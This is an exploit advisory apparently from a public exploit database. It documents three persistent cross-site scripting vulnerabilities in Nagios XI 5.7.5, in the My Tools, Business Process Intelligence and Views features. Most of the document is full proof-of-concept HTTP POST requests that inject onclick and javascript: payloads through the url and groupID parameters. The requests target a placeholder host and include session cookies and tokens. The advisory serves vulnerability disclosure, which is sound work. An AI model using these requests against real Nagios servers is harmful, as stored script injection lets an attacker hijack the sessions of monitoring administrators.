# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
# Date: 1-20-2021
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.5
# Tested on: Ubuntu 18.04


# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
# Vulnerable Parameter : url


# POC
# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.

POST /nagiosxi/tools/mytools.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
Upgrade-Insecure-Requests: 1

nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=


############################################################################################################

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.
# Vulnerable Parameter : groupID


# POC
# Exploit Details : The following request will create a BPI group with an XSS payload.  Click on the Group ID for the malicious BPI group to trigger the payload.

POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
Upgrade-Insecure-Requests: 1

groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true


############################################################################################################

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI.
# Vulnerable Parameter : url


# POC
# Exploit Details : The following request will create a view with an XSS payload.  Click on the malicious view to trigger the payload.

POST /nagiosxi/ajaxhelper.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 147
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/account/
Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td

cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056